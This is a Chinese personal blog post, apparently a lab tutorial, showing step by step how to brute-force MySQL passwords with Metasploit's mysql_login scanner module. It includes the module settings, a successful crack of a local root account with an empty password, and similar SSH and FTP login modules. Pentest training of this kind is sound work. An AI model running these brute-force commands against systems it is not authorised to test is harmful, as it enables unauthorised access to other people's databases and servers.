Metasploit之口令安全

  • A+
所属分类:颓废's Blog

Metasploit之口令安全

这里测试的是MySQL数据库的口令安全

首先,我们的靶机上需要开启MySQL数据库(破解本地才需要这样)

回想:当初启动ssh的命令:service ssh start,那么启动MySQL:service mysql start
同理:查看相关命令启动状态:service ssh ststus,MySQL查看状态:service mysql ststus
得到:Active: active (running),即证明开启成功

------------------------------------------------------------------------------------------------
远程MySQL爆破步骤:

metasploit下进行操作

search mysql_login        -->搜索相关MySQL登陆的模块,得到auxiliary/scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login    -->使用这个模块

show options              -->查看配置选项,这里的选项比较多,逐一解释

PASSWORD,设置密码;PASS_FILE,设置密码文件;USERNAME,设置账户;USERPASS_FILE,设置账户文件

set RHOSTS 192.168.2.149    -->设置目标主机IP

set USERNAME root         -->设置爆破的账户为root

set PASS_FILE /root/1.txt    -->设置爆破密码文本

set THREADS 10           -->设置线程数

show options             -->最后查看我们的设置成功没有

exploit                  -->开始运行攻击破解MySQL密码

PS:这里我是kali-linux2.0去破解我的Windows2003的MySQL出了点错误
回显:版不支持mysql 3306目标检测

我又重新设置了目标IP

set RHOSTS 127.0.0.1    -->设置攻击对象为本地的MySQL数据库,之前启动过MySQL的服务的

exploit                 -->开始运行攻击破解MySQL密码

回显:[+] 127.0.0.1:3306        - MYSQL - Success: 'root:'
PS:成功爆破,账号root,密码空

------------------------------------------------------------------------------------------------
PS:kali-linux连接MySQL命令

mysql -u root -p    -->连接MySQL,回显:Enter password:(输入密码,我的本地为空,直接回车)

本章节同样的道理

search ssh_login    -->搜索ssh的登陆爆破模块
auxiliary/scanner/ssh/ssh_login           -->ssh登陆口令
auxiliary/scanner/ssh/ssh_login_pubkey    -->ssh登陆的公共密匙

search ftp_login    -->搜索FTP的登陆爆破模块
auxiliary/scanner/ftp/ftp_login           -->FTP登陆口令

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: